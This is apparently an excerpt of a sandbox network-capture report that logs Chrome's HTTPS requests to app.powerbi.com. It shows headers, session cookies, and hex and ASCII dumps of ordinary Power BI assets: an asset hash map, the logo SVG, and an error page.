                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          Cookie: ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 953770
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:30:05 GMT
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Access-Control-Allow-Origin: https://teams.powerbi.com
                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                          ETag: "0e7f6f18248db1:0"
                                                                                                                                                                                                          Last-Modified: Sat, 07 Dec 2024 08:35:18 GMT
                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://teams.powerbi.com 'self' https://res-sdf.cdn.office.net https://res.cdn.office.net https://mesh.public.onecdn.static.microsoft https://m365.cloud.microsoft https://outlook.cloud.microsoft https://teams.cloud.microsoft https://teams.microsoft.com https://gov.teams.microsoft.us https://dod.teams.microsoft.us https://outlook.office.com https://outlook-sdf.office.com https://outlook.office365.com https://outlook-sdf.office365.com https://www.office.com https://scuprodprv.www.office.com https://www.microsoft365.com https://local.loop.microsoft.com https://dev.loop.microsoft.com https://df.loop.microsoft.com https://loop.microsoft.com
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC2725INData Raw: 76 61 72 20 68 61 73 68 4d 61 70 70 69 6e 67 73 20 3d 20 7b 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 6d 69 6e 2e 6a 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 6d 69 6e 2e 39 61 63 30 37 37 31 62 61 61 33 31 34 39 34 62 66 65 30 36 2e 6a 73 22 2c 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 6d 69 6e 2e 63 73 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 6d 69 6e 2e 31 37 64 36 31 38 61 38 61 63 33 38 35 32 61 31 64 64 35 32 2e 63 73 73 22 2c 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 72 74 6c 2e 6d 69 6e 2e 63 73 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 72 74 6c 2e 6d 69 6e 2e 31 37 64 36 31 38 61 38 61 63 33 38 35 32 61 31 64 64 35 32 2e 63 73 73
                                                                                                                                                                                                          Data Ascii: var hashMappings = {"externals/cropper.min.js":"externals/cropper.min.9ac0771baa31494bfe06.js","externals/cropper.min.css":"externals/cropper.min.17d618a8ac3852a1dd52.css","externals/cropper.rtl.min.css":"externals/cropper.rtl.min.17d618a8ac3852a1dd52.css
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 4d 44 4c 33 2e 74 74 66 22 3a 22 66 6f 6e 74 73 2f 50 6f 77 72 4d 44 4c 33 2e 31 66 39 66 65 66 66 66 32 30 32 37 35 36 31 65 65 61 61 62 2e 74 74 66 22 2c 22 66 6f 6e 74 73 2f 50 6f 77 72 4d 44 4c 33 2e 65 6f 74 22 3a 22 66 6f 6e 74 73 2f 50 6f 77 72 4d 44 4c 33 2e 34 38 64 39 30 30 35 31 65 36 39 37 61 33 62 37 32 63 61 31 2e 65 6f 74 22 2c 22 66 6f 6e 74 73 2f 50 6f 77 72 4d 44 4c 33 2e 73 76 67 22 3a 22 66 6f 6e 74 73 2f 50 6f 77 72 4d 44 4c 33 2e 61 36 65 36 30 38 36 39 34 32 30 63 63 62 32 39 31 30 64 65 2e 73 76 67 22 2c 22 66 6f 6e 74 73 2f 50 6f 77 72 4d 44 4c 33 2e 77 6f 66 66 22 3a 22 66 6f 6e 74 73 2f 50 6f 77 72 4d 44 4c 33 2e 66 61 37 64 63 39 37 34 34 63 34 38 30 34 38 33 30 36 35 39 2e 77 6f 66 66 22 2c 22 66 6f 6e 74 73 2f 53 65 67 6f 65
                                                                                                                                                                                                          Data Ascii: MDL3.ttf":"fonts/PowrMDL3.1f9fefff2027561eeaab.ttf","fonts/PowrMDL3.eot":"fonts/PowrMDL3.48d90051e697a3b72ca1.eot","fonts/PowrMDL3.svg":"fonts/PowrMDL3.a6e60869420ccb2910de.svg","fonts/PowrMDL3.woff":"fonts/PowrMDL3.fa7dc9744c4804830659.woff","fonts/Segoe
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 63 6f 6e 6e 65 63 74 69 76 69 74 79 2e 72 74 6c 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 63 6f 6e 6e 65 63 74 69 76 69 74 79 2e 72 74 6c 2e 6d 69 6e 2e 64 61 33 39 61 33 65 65 35 65 36 62 34 62 30 64 33 32 35 35 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 63 6f 6e 74 65 6e 74 50 72 6f 76 69 64 65 72 73 2e 6d 61 74 65 72 69 61 6c 2d 74 68 65 6d 65 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 63 6f 6e 74 65 6e 74 50 72 6f 76 69 64 65 72 73 2e 6d 61 74 65 72 69 61 6c 2d 74 68 65 6d 65 2e 6d 69 6e 2e 37 37 63 36 30 30 33 36 31 38 37 39 31 32 66 63 39 33 38 64 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 63 72 6f 70 70 65 72 2e 72 74 6c 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 63 72 6f 70 70 65 72 2e 72 74 6c 2e 6d 69 6e 2e 31 37
                                                                                                                                                                                                          Data Ascii: connectivity.rtl.min.css":"styles/connectivity.rtl.min.da39a3ee5e6b4b0d3255.css","styles/contentProviders.material-theme.min.css":"styles/contentProviders.material-theme.min.77c60036187912fc938d.css","styles/cropper.rtl.min.css":"styles/cropper.rtl.min.17
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 62 36 36 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 70 69 76 6f 74 54 61 62 6c 65 56 69 73 75 61 6c 73 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 70 69 76 6f 74 54 61 62 6c 65 56 69 73 75 61 6c 73 2e 6d 69 6e 2e 61 33 62 39 31 63 64 61 35 36 65 64 39 32 33 30 35 65 63 37 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 70 69 76 6f 74 54 61 62 6c 65 56 69 73 75 61 6c 73 2e 72 74 6c 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 70 69 76 6f 74 54 61 62 6c 65 56 69 73 75 61 6c 73 2e 72 74 6c 2e 6d 69 6e 2e 30 39 35 65 34 32 34 35 38 31 62 62 38 65 61 34 36 37 39 64 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 70 6f 77 65 72 62 69 2e 63 6f 6d 6d 6f 6e 2e 65 78 74 65 72 6e 61 6c 73 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 70 6f 77 65 72 62
                                                                                                                                                                                                          Data Ascii: b66.css","styles/pivotTableVisuals.min.css":"styles/pivotTableVisuals.min.a3b91cda56ed92305ec7.css","styles/pivotTableVisuals.rtl.min.css":"styles/pivotTableVisuals.rtl.min.095e424581bb8ea4679d.css","styles/powerbi.common.externals.min.css":"styles/powerb
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 69 73 74 2e 6d 61 74 65 72 69 61 6c 2d 74 68 65 6d 65 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 73 68 61 72 65 70 6f 69 6e 74 4c 69 73 74 2e 6d 61 74 65 72 69 61 6c 2d 74 68 65 6d 65 2e 6d 69 6e 2e 32 63 61 37 31 62 64 33 37 33 34 37 66 31 39 31 32 39 63 36 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 73 74 6f 72 79 74 65 6c 6c 69 6e 67 41 64 64 49 6e 2e 6d 61 74 65 72 69 61 6c 2d 74 68 65 6d 65 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 73 74 6f 72 79 74 65 6c 6c 69 6e 67 41 64 64 49 6e 2e 6d 61 74 65 72 69 61 6c 2d 74 68 65 6d 65 2e 6d 69 6e 2e 64 63 63 34 63 39 32 37 39 31 66 33 34 35 36 66 30 32 35 36 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 73 74 79 6c 65 4c 69 62 72 61 72 79 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f
                                                                                                                                                                                                          Data Ascii: ist.material-theme.min.css":"styles/sharepointList.material-theme.min.2ca71bd37347f19129c6.css","styles/storytellingAddIn.material-theme.min.css":"styles/storytellingAddIn.material-theme.min.dcc4c92791f3456f0256.css","styles/styleLibrary.min.css":"styles/
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 2f 61 72 72 6f 77 5f 6c 65 66 74 2e 37 38 30 64 63 62 31 38 64 31 36 31 31 31 30 33 61 33 31 33 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 72 69 67 68 74 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 72 69 67 68 74 2e 33 62 65 66 61 31 62 34 36 34 65 66 61 65 32 32 37 39 34 63 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 74 6f 70 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 74 6f 70 2e 66 64 31 35 31 37 36 38 65 31 39 31 39 64 64 61 30 63 61 33 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 61 72 74 69 66 61 63 74 2d 63 6f 6c 6f 72 65 64 2d 69 63 6f 6e 73 2e 73 76 67 22 3a 22 69 6d 61 67 65 73 2f 61 72 74 69 66 61 63 74 2d 63 6f 6c 6f 72 65 64 2d 69 63 6f 6e 73 2e 63 32 33 31 63 33 64 33 34 64 62 36
                                                                                                                                                                                                          Data Ascii: /arrow_left.780dcb18d1611103a313.png","images/arrow_right.png":"images/arrow_right.3befa1b464efae22794c.png","images/arrow_top.png":"images/arrow_top.fd151768e1919dda0ca3.png","images/artifact-colored-icons.svg":"images/artifact-colored-icons.c231c3d34db6
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 37 36 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 42 61 63 6b 67 72 6f 75 6e 64 36 54 68 75 6d 62 6e 61 69 6c 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 42 61 63 6b 67 72 6f 75 6e 64 36 54 68 75 6d 62 6e 61 69 6c 2e 65 34 32 63 63 30 34 66 66 30 39 35 35 64 64 63 63 62 64 63 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 62 61 63 6b 67 72 6f 75 6e 64 37 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 62 61 63 6b 67 72 6f 75 6e 64 37 2e 33 31 32 32 30 35 65 65 37 64 65 61 61 32 36 66 64 62 33 36 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 42 61 63 6b 67 72 6f 75 6e 64 37 52 6f 75 6e 64 65 64 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 42 61 63 6b 67 72 6f 75 6e 64 37 52 6f 75 6e 64 65 64 2e 66 62 38 31 62 66 37 32 36 38 35 31 30 61 62 36 64 64 61 38 2e 70 6e 67 22 2c 22 69
                                                                                                                                                                                                          Data Ascii: 76.png","images/Background6Thumbnail.png":"images/Background6Thumbnail.e42cc04ff0955ddccbdc.png","images/background7.png":"images/background7.312205ee7deaa26fdb36.png","images/Background7Rounded.png":"images/Background7Rounded.fb81bf7268510ab6dda8.png","i
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 6f 77 64 61 72 6b 2e 65 35 38 36 38 37 34 62 34 32 33 66 62 61 36 38 34 37 31 38 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6c 6f 73 65 5f 31 78 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6c 6f 73 65 5f 31 78 2e 32 62 36 36 61 39 35 30 30 35 30 62 61 62 65 36 62 66 33 63 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6c 2d 72 65 73 69 7a 69 6e 67 2d 63 75 72 73 6f 72 2e 73 76 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6c 2d 72 65 73 69 7a 69 6e 67 2d 63 75 72 73 6f 72 2e 63 62 39 38 64 61 35 62 36 61 63 62 30 37 32 38 33 31 65 35 2e 73 76 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6c 6c 61 70 73 65 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6c 6c 61 70 73 65 2e 61 32 33 38 35 66 63 32 65 30 64 33 66 62 62 31 63 39 31 37 2e 70 6e 67 22 2c 22 69 6d 61 67
                                                                                                                                                                                                          Data Ascii: owdark.e586874b423fba684718.png","images/close_1x.png":"images/close_1x.2b66a950050babe6bf3c.png","images/col-resizing-cursor.svg":"images/col-resizing-cursor.cb98da5b6acb072831e5.svg","images/collapse.png":"images/collapse.a2385fc2e0d3fbb1c917.png","imag
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 6d 69 63 72 6f 73 6f 66 74 2d 64 79 6e 61 6d 69 63 73 2d 63 72 6d 2d 70 73 61 2d 61 63 63 6f 75 6e 74 2d 6d 61 6e 61 67 65 72 2e 32 64 39 37 61 66 35 30 65 36 33 33 61 38 62 31 35 37 38 35 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 6d 69 63 72 6f 73 6f 66 74 2d 64 79 6e 61 6d 69 63 73 2d 63 72 6d 2d 70 73 61 2d 70 72 61 63 74 69 63 65 2d 6d 61 6e 61 67 65 72 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 6d 69 63 72 6f 73 6f 66 74 2d 64 79 6e 61 6d 69 63 73 2d 63 72 6d 2d 70 73 61 2d 70 72 61 63 74 69 63 65 2d 6d 61 6e 61 67 65 72 2e 32 64 39 37 61 66 35 30 65 36 33 33 61 38 62 31 35 37 38 35
                                                                                                                                                                                                          Data Ascii: mages/content-provider-microsoft-dynamics-crm-psa-account-manager.2d97af50e633a8b15785.png","images/content-provider-microsoft-dynamics-crm-psa-practice-manager.png":"images/content-provider-microsoft-dynamics-crm-psa-practice-manager.2d97af50e633a8b15785
                                                                                                                                                                                                          2024-12-11 23:30:06 UTC4096INData Raw: 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 76 69 73 75 61 6c 2d 73 74 75 64 69 6f 2d 6f 6e 6c 69 6e 65 2e 31 39 38 32 37 62 35 32 65 30 61 66 31 34 32 35 62 32 63 33 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 76 6d 6f 62 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 76 6d 6f 62 2e 36 65 64 30 31 65 35 33 38 30 33 34 33 63 33 66 65 33 32 38 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 77 65 62 74 72 65 6e 64 73 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 77 65 62 74 72 65 6e 64 73 2e 35 37 36 31 64 36 33 30 30 62 31 34 66 39 31 64 61 37 66 34 2e 70 6e 67 22 2c 22 69 6d
                                                                                                                                                                                                          Data Ascii: ent-provider-visual-studio-online.19827b52e0af1425b2c3.png","images/content-provider-vmob.png":"images/content-provider-vmob.6ed01e5380343c3fe328.png","images/content-provider-webtrends.png":"images/content-provider-webtrends.5761d6300b14f91da7f4.png","im


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          35192.168.2.45000020.38.136.704431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:30:20 UTC1268OUTGET /13.0.24766.39/images/PowerBI_MasterLogo.svg HTTP/1.1
                                                                                                                                                                                                          Host: app.powerbi.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                          Sec-Fetch-Dest: object
                                                                                                                                                                                                          Referer: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; EnableCSP=PROD; ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ai_user=2kQWAod7KlEqEF58e20SmV|2024-12-11T23:30:09.794Z; ai_session=5euVcVh3S9yhv4eHm/fvHb|1733959809798|1733959809798
                                                                                                                                                                                                          2024-12-11 23:30:20 UTC1826INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 2995
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:30:20 GMT
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Access-Control-Allow-Origin: https://teams.powerbi.com
                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                          ETag: "08d94ef8248db1:0"
                                                                                                                                                                                                          Last-Modified: Sat, 07 Dec 2024 08:35:14 GMT
                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://teams.powerbi.com 'self' https://res-sdf.cdn.office.net https://res.cdn.office.net https://mesh.public.onecdn.static.microsoft https://m365.cloud.microsoft https://outlook.cloud.microsoft https://teams.cloud.microsoft https://teams.microsoft.com https://gov.teams.microsoft.us https://dod.teams.microsoft.us https://outlook.office.com https://outlook-sdf.office.com https://outlook.office365.com https://outlook-sdf.office365.com https://www.office.com https://scuprodprv.www.office.com https://www.microsoft365.com https://local.loop.microsoft.com https://dev.loop.microsoft.com https://df.loop.microsoft.com https://loop.microsoft.com; report-uri /cspreport; media-src http: https: data:; frame-src blob: https: http: azuredatastudio:; worker-src 'self' blob:; img-src http: https: blob: data:; style-src data: blob: *.microsoft.com *.bing.com *.powerapps.com https://*.powerapps.com *.walkme.com use.fontawesome.com *.googleapis.com 'self' 'unsafe-inline' *.bootstrapcdn.c [TRUNCATED]
                                                                                                                                                                                                          2024-12-11 23:30:20 UTC2082INData Raw: 3c 73 76 67 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 20 77 69 64 74 68 3d 22 31 36 30 30 22 20 68 65 69 67 68 74 3d 22 31 36 30 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 30 30 20 31 36 30 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 6d 61 73 6b 30 5f 38 35 39 32 3a 35 36 31 39 38 22 20 73 74 79 6c 65 3d 22 6d 61 73 6b 2d 74 79 70 65 3a 61 6c 70 68 61 22 20 6d 61 73 6b 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 3d 22 32 30 30 22 20 79 3d 22 30 22 20 77 69 64 74 68 3d 22 31 32 30 30 22 20 68 65 69 67 68 74 3d 22 31 36 30 30 22 3e 0d 0a 3c 70 61 74 68 20 64 3d
                                                                                                                                                                                                          Data Ascii: <svg role="presentation" width="1600" height="1600" viewBox="0 0 1600 1600" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="mask0_8592:56198" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="200" y="0" width="1200" height="1600"><path d=
                                                                                                                                                                                                          2024-12-11 23:30:20 UTC913INData Raw: 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 2e 31 38 20 30 22 2f 3e 0d 0a 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 32 3d 22 65 66 66 65 63 74 31 5f 64 72 6f 70 53 68 61 64 6f 77 5f 38 35 39 32 3a 35 36 31 39 38 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 32 5f 64 72 6f 70 53 68 61 64 6f 77 5f 38 35 39 32 3a 35 36 31 39 38 22 2f 3e 0d 0a 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 65 66 66 65 63 74 32 5f 64 72 6f 70 53 68 61 64 6f 77 5f 38 35 39 32 3a 35 36 31 39 38 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 2f 3e 0d 0a 3c 2f 66 69 6c 74 65 72 3e 0d 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d
                                                                                                                                                                                                          Data Ascii: 0 0 0 0 0 0 0 0 0.18 0"/><feBlend mode="normal" in2="effect1_dropShadow_8592:56198" result="effect2_dropShadow_8592:56198"/><feBlend mode="normal" in="SourceGraphic" in2="effect2_dropShadow_8592:56198" result="shape"/></filter><linearGradient id=


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          36192.168.2.45007920.38.136.704431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:30:23 UTC1113OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                          Host: app.powerbi.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                          Referer: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; EnableCSP=PROD; ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ai_user=2kQWAod7KlEqEF58e20SmV|2024-12-11T23:30:09.794Z; ai_session=5euVcVh3S9yhv4eHm/fvHb|1733959809798|1733959809798
                                                                                                                                                                                                          2024-12-11 23:30:23 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 17782
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:30:23 GMT
                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                          2024-12-11 23:30:23 UTC3654INData Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 6f 77 65 72 20 42 49 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 3b 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Power BI Error</title> <meta http-equiv="X-UA-Compatible" content="IE=edge;" /> <meta charset="utf-8"> <meta name="description" conten
                                                                                                                                                                                                          2024-12-11 23:30:23 UTC4096INData Raw: 74 69 6d 69 7a 65 64 41 70 70 4d 65 74 61 64 61 74 61 46 6f 72 41 70 70 4c 61 6e 64 69 6e 67 45 6e 61 62 6c 65 64 46 6f 72 42 6f 6f 74 73 74 72 61 70 20 3d 20 27 74 72 75 65 27 3b 0d 0a 20 20 20 20 76 61 72 20 72 65 71 75 65 73 74 57 56 32 46 69 72 73 74 20 3d 20 74 72 75 65 3b 0d 0a 20 20 20 20 76 61 72 20 70 6f 77 65 72 42 49 47 6f 61 6c 73 45 6e 61 62 6c 65 64 46 6f 72 42 6f 6f 74 73 74 72 61 70 20 3d 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 76 61 72 20 65 6d 62 65 64 64 65 64 57 65 62 43 6f 6e 74 65 6e 74 49 66 72 61 6d 65 53 6f 75 72 63 65 20 3d 20 27 68 74 74 70 73 3a 2f 2f 61 70 70 2e 70 62 69 77 65 62 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 77 65 62 63 6f 6e 74 65 6e 74 73 61 6e 64 62 6f 78 2e 68 74 6d 6c 27 3b 0d 0a 20 20 20 20 76 61 72 20 73 75 70 70
                                                                                                                                                                                                          Data Ascii: timizedAppMetadataForAppLandingEnabledForBootstrap = 'true'; var requestWV2First = true; var powerBIGoalsEnabledForBootstrap = false; var embeddedWebContentIframeSource = 'https://app.pbiwebcontent.com/webcontentsandbox.html'; var supp
